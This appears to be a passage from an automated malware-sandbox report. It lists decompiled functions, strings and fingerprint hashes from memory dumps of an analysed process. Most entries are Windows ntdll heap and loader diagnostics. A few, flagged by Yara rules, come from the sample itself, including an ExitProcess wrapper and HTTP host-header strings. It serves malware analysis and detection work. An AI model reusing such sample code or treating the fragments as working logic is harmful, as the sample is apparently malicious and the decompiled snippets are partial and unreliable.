                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                    0x0041a0b3
                                                    0x0041a0ca
                                                    0x0041a0d8

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0157967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8031ec8bbcd5f1d5445064a091ba8476d074459aa6cb109d9950ecbdb9b4532d
                                                    • Instruction ID: 64ae32f6c1248517d4fb298d0b5879a9b6d64a310c77f16a944ffea97d873dea
                                                    • Opcode Fuzzy Hash: 8031ec8bbcd5f1d5445064a091ba8476d074459aa6cb109d9950ecbdb9b4532d
                                                    • Instruction Fuzzy Hash: 60B02B718010C0C5D601E3A08608F1B394077D0300F12C011D1020A40B4338C080F1B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 015EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 015EB53F
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 015EB323
                                                    • <unknown>, xrefs: 015EB27E, 015EB2D1, 015EB350, 015EB399, 015EB417, 015EB48E
                                                    • This failed because of error %Ix., xrefs: 015EB446
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 015EB2F3
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 015EB47D
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015EB38F
                                                    • The instruction at %p tried to %s , xrefs: 015EB4B6
                                                    • *** enter .exr %p for the exception record, xrefs: 015EB4F1
                                                    • an invalid address, %p, xrefs: 015EB4CF
                                                    • write to, xrefs: 015EB4A6
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 015EB48F
                                                    • Go determine why that thread has not released the critical section., xrefs: 015EB3C5
                                                    • The resource is owned exclusively by thread %p, xrefs: 015EB374
                                                    • *** Inpage error in %ws:%s, xrefs: 015EB418
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 015EB314
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 015EB484
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 015EB2DC
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015EB3D6
                                                    • The critical section is owned by thread %p., xrefs: 015EB3B9
                                                    • The resource is owned shared by %d threads, xrefs: 015EB37E
                                                    • The instruction at %p referenced memory at %p., xrefs: 015EB432
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 015EB305
                                                    • *** enter .cxr %p for the context, xrefs: 015EB50D
                                                    • a NULL pointer, xrefs: 015EB4E0
                                                    • read from, xrefs: 015EB4AD, 015EB4B2
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 015EB352
                                                    • *** then kb to get the faulting stack, xrefs: 015EB51C
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 015EB39B
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 015EB476
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: a62671552883108f91445312feddfe3dd68954ae3a5b539d307e3e413c01d192
                                                    • Instruction ID: 879b56b123fc0f026917c7bdcb9e0ecb9b2f2f83076d15b3ca7bfc6c75379816
                                                    • Opcode Fuzzy Hash: a62671552883108f91445312feddfe3dd68954ae3a5b539d307e3e413c01d192
                                                    • Instruction Fuzzy Hash: D781F676E40221FFDB296E8ACC4ED6F3BB6FF97A92F404048F5042F152E2659441CA72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015F1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E015F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x15148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0153B150();
				} else {
					E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x162589c);
				E0153B150("Heap error detected at %p (heap handle %p)\n",  *0x16258a0);
				_t27 =  *0x1625898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M015F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0153B150();
				} else {
					E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0153B150("Error code: %d - %s\n",  *0x1625898);
				_t113 =  *0x16258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0153B150();
					} else {
						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0153B150("Parameter1: %p\n",  *0x16258a4);
				}
				_t115 =  *0x16258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0153B150();
					} else {
						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0153B150("Parameter2: %p\n",  *0x16258a8);
				}
				_t117 =  *0x16258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0153B150();
					} else {
						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0153B150("Parameter3: %p\n",  *0x16258ac);
				}
				_t119 =  *0x16258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0153B150();
					} else {
						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16258b4);
					E0153B150("Last known valid blocks: before - %p, after - %p\n",  *0x16258b0);
				} else {
					_t120 =  *0x16258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0153B150();
				} else {
					E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0153B150("Stack trace available at %p\n", 0x16258c0);
			}











                                                    0x015f1c10
                                                    0x015f1c16
                                                    0x015f1c1e
                                                    0x015f1c3d
                                                    0x015f1c3e
                                                    0x015f1c20
                                                    0x015f1c35
                                                    0x015f1c3a
                                                    0x015f1c44
                                                    0x015f1c55
                                                    0x015f1c5a
                                                    0x015f1c65
                                                    0x015f1c67
                                                    0x00000000
                                                    0x015f1c6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x015f1c67
                                                    0x015f1cdc
                                                    0x015f1ce5
                                                    0x015f1d04
                                                    0x015f1d05
                                                    0x015f1ce7
                                                    0x015f1cfc
                                                    0x015f1d01
                                                    0x015f1d0b
                                                    0x015f1d17
                                                    0x015f1d1f
                                                    0x015f1d25
                                                    0x015f1d30
                                                    0x015f1d4f
                                                    0x015f1d50
                                                    0x015f1d32
                                                    0x015f1d47
                                                    0x015f1d4c
                                                    0x015f1d61
                                                    0x015f1d67
                                                    0x015f1d68
                                                    0x015f1d6e
                                                    0x015f1d79
                                                    0x015f1d98
                                                    0x015f1d99
                                                    0x015f1d7b
                                                    0x015f1d90
                                                    0x015f1d95
                                                    0x015f1daa
                                                    0x015f1db0
                                                    0x015f1db1
                                                    0x015f1db7
                                                    0x015f1dc2
                                                    0x015f1de1
                                                    0x015f1de2
                                                    0x015f1dc4
                                                    0x015f1dd9
                                                    0x015f1dde
                                                    0x015f1df3
                                                    0x015f1df9
                                                    0x015f1dfa
                                                    0x015f1e00
                                                    0x015f1e0a
                                                    0x015f1e13
                                                    0x015f1e32
                                                    0x015f1e33
                                                    0x015f1e15
                                                    0x015f1e2a
                                                    0x015f1e2f
                                                    0x015f1e39
                                                    0x015f1e4a
                                                    0x015f1e02
                                                    0x015f1e02
                                                    0x015f1e08
                                                    0x00000000
                                                    0x00000000
                                                    0x015f1e08
                                                    0x015f1e5b
                                                    0x015f1e7a
                                                    0x015f1e7b
                                                    0x015f1e5d
                                                    0x015f1e72
                                                    0x015f1e77
                                                    0x015f1e95

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 4259819ef9f24a7b43cf92b276d1c3ef210eddbb66dbe677c900188d063a919a
                                                    • Instruction ID: 037a6924ee069498a2e24706c84c6438a6ec88f7daba1801417ba9c21a4b9deb
                                                    • Opcode Fuzzy Hash: 4259819ef9f24a7b43cf92b276d1c3ef210eddbb66dbe677c900188d063a919a
                                                    • Instruction Fuzzy Hash: A361E533510966DFD331AB89D8C6E3877E4FB45930F09846EF70A9F384D6B898418B0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00416C96, Relevance: 7.6, Strings: 6, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $: $: $Host$Host: $Unknown
                                                    • API String ID: 0-3527920956
                                                    • Opcode ID: b3fae090131a80bd029623294f3545b807d829eaad322e1187c901e42d42e0d2
                                                    • Instruction ID: c73720650d0308e043dd651217ad3673d7f5387b2a3ffe2320e9d7bfff04ae81
                                                    • Opcode Fuzzy Hash: b3fae090131a80bd029623294f3545b807d829eaad322e1187c901e42d42e0d2
                                                    • Instruction Fuzzy Hash: FA31D476904208ABCB10CF98CC81FEEB7B8EF89304F04866AF9199B245D775A545C7F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01543D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 01543D6F
                                                    • Kernel-MUI-Number-Allowed, xrefs: 01543D8C
                                                    • Kernel-MUI-Language-SKU, xrefs: 01543F70
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01543E97
                                                    • Kernel-MUI-Language-Allowed, xrefs: 01543DC0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: 11d42b8f52f8a651290f7f96c3910249a66c008bda8d75a71f71a4691abc7880
                                                    • Instruction ID: 8c29a44160e9bc20b98148e0186804af05360e5edb5e56a0e9a6d8ca3850ea8f
                                                    • Opcode Fuzzy Hash: 11d42b8f52f8a651290f7f96c3910249a66c008bda8d75a71f71a4691abc7880
                                                    • Instruction Fuzzy Hash: 92F13E72D4061AEFDF11DF98D980AEEBBB9FF58650F14046AE905AF250D7349E01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01568E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpFindDllActivationContext, xrefs: 015A9331, 015A935D
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015A932A
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015A933B, 015A9367
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 015A9357
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 98319f05c915c5cc18ff02e754fe57309c8de6a1280a2c0685c151cfd9671660
                                                    • Instruction ID: cd467099efc7ffe7c6c344531e680f55078dac813fd5827bce5aac52b95d7193
                                                    • Opcode Fuzzy Hash: 98319f05c915c5cc18ff02e754fe57309c8de6a1280a2c0685c151cfd9671660
                                                    • Instruction Fuzzy Hash: EF41F832A407169FEB36AB1C8C89B7DB7BDBB41254F46466AE9045F151E7B05DC0C3C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01548794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01599C18
                                                    • LdrpDoPostSnapWork, xrefs: 01599C1E
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01599C28
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 2994545307-1948996284
                                                    • Opcode ID: 00de456585454c2ef9e85a967db1f932cc5f8f96296d05839e19c696865a1cb1
                                                    • Instruction ID: ab4f4be81f96abfeb8043c6c6a3675daad231eba8bbaeeea834e919dbe7f2314
                                                    • Opcode Fuzzy Hash: 00de456585454c2ef9e85a967db1f932cc5f8f96296d05839e19c696865a1cb1
                                                    • Instruction Fuzzy Hash: 52910371A00616DBEF29DF99D881ABE77B5FF84318B08456DEA05AF241E730E901CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01547E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01599891
                                                    • LdrpCompleteMapModule, xrefs: 01599898
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 015998A2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 8830e21de91cf3da86c2d71523ba6c0a8e13c734d1d49f48747f309d46bdc362
                                                    • Instruction ID: 63bbd90b7e04b349933847c9dcc85a616fb4ea1afb34fea6d95dcf1e063fdeaf
                                                    • Opcode Fuzzy Hash: 8830e21de91cf3da86c2d71523ba6c0a8e13c734d1d49f48747f309d46bdc362
                                                    • Instruction Fuzzy Hash: 2851DE316007469FEB32CB6CC944B6ABBE4FB49318F140A99E9519F7D1D734E901CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0153E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • @, xrefs: 0153E6C0
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0153E68C
                                                    • InstallLanguageFallback, xrefs: 0153E6DB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: 8bd80e4172f4668df5357edf72087dc5207dfca61cdb67eab7d6f47485664c22
                                                    • Instruction ID: c70ac8aa85d71f02619f375e828972aeb29b98515d2d7998428c893e92b4f8d4
                                                    • Opcode Fuzzy Hash: 8bd80e4172f4668df5357edf72087dc5207dfca61cdb67eab7d6f47485664c22
                                                    • Instruction Fuzzy Hash: D851A1725143469BDB12DF68C840A6FB7E8FF88654F45092EF989DB240F734D914C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015FE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction ID: 9191ce6e2c0b8e438e8caca772a0d71e4c31a13655e164c390cd4195bd54209e
                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction Fuzzy Hash: A2915D312043429BE725CE29C846B1BBBE5FFC4714F15892DF699CB290E774E904CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 49b92ad6a18f257e406e4cafbf7fac37d5ba5c8db4a096b763357c434ccb26a2
                                                    • Instruction ID: 74b15e9aa87ab52bbd819d6c741940889bed8aeacd71ff0d5ab1256582170f98
                                                    • Opcode Fuzzy Hash: 49b92ad6a18f257e406e4cafbf7fac37d5ba5c8db4a096b763357c434ccb26a2
                                                    • Instruction Fuzzy Hash: 72517C71A116099FDB29DFA8C880AADBBF8FF48700F14442DE649EF251E6719941CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0155B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0155B9A5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: adfca3d2503e34e5a17fe3ac259ad7fc191f1ad631c5f26bf3a1c0078e7f006a
                                                    • Instruction ID: 00659d367e2da16bc1b1cc2512b4b2a78e7df83456b3780fbb0e93168a2d61a3
                                                    • Opcode Fuzzy Hash: adfca3d2503e34e5a17fe3ac259ad7fc191f1ad631c5f26bf3a1c0078e7f006a
                                                    • Instruction Fuzzy Hash: DF515971A08741CFC761CF28C4A492EBBFAFB88610F54896EF9858B355D771E844CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0153B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 9a4462503fcd34773ecf6afdc7e8e19cce4df61e73af48066cfb16213e87f32d
                                                    • Instruction ID: 63e9341197ba3982278874bdbcdda4d24dec78f8b1afee4a5a3ff5f7cd3265d2
                                                    • Opcode Fuzzy Hash: 9a4462503fcd34773ecf6afdc7e8e19cce4df61e73af48066cfb16213e87f32d
                                                    • Instruction Fuzzy Hash: 3751CE71D0025A8AEF35CF688A45BBEBBF0BF40714F1041ADD859AF282D7744D42CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01562581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: 910211ef9dfabc70437e4f8bb39ddbb7092fbbda65e2cf07af065b698d6de92f
                                                    • Instruction ID: 8b45599b8a070ddefc37dd999c2683d19a77c99a651eb6fa280a94825caf9600
                                                    • Opcode Fuzzy Hash: 910211ef9dfabc70437e4f8bb39ddbb7092fbbda65e2cf07af065b698d6de92f
                                                    • Instruction Fuzzy Hash: E8C19F71E1061ADFDB25DF98DC81AADBBF9FF48740F444429E901AF250E738A941CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 015ABE0F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 6e72934094f23b9a9bf1fcce47464e8f7e9d36bd7209dc036a0e1475904997f8
                                                    • Instruction ID: e0d076c5ab4a015046db3b7d27432b03df297b2d78c12912638a9061a75778b6
                                                    • Opcode Fuzzy Hash: 6e72934094f23b9a9bf1fcce47464e8f7e9d36bd7209dc036a0e1475904997f8
                                                    • Instruction Fuzzy Hash: D4A1F171E046068FEB25DF6CD860B6EBBA9BF48714F04456AEA16CF694DB30D841CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01532D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: 87d7a1446d1b32c6a94e602650c013bb71fd864a5312bee7ed9b1fe61da7731c
                                                    • Instruction ID: 1fb0668234d1c0449cfe42bec6e49659dabd943461da4286441680ac5482d10a
                                                    • Opcode Fuzzy Hash: 87d7a1446d1b32c6a94e602650c013bb71fd864a5312bee7ed9b1fe61da7731c
                                                    • Instruction Fuzzy Hash: B1613931A00A069FDB32EF6CC845B7EBBE5FB88724F14065AD911AF2C1C7749941C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01600EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 1e6ddac8e606ebf9d31fd0da9a4f9a950074e5464fbda53211a5daa973bfc35f
                                                    • Instruction ID: 5fdbb5a1389c0ab9681299dab401fdb0c3353f333302a396fe9e0ad7cbf33c47
                                                    • Opcode Fuzzy Hash: 1e6ddac8e606ebf9d31fd0da9a4f9a950074e5464fbda53211a5daa973bfc35f
                                                    • Instruction Fuzzy Hash: 4C518C712043829BD32ADF28DC80B1BBBE5EBC5754F04092DFA968B290DB70E805C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

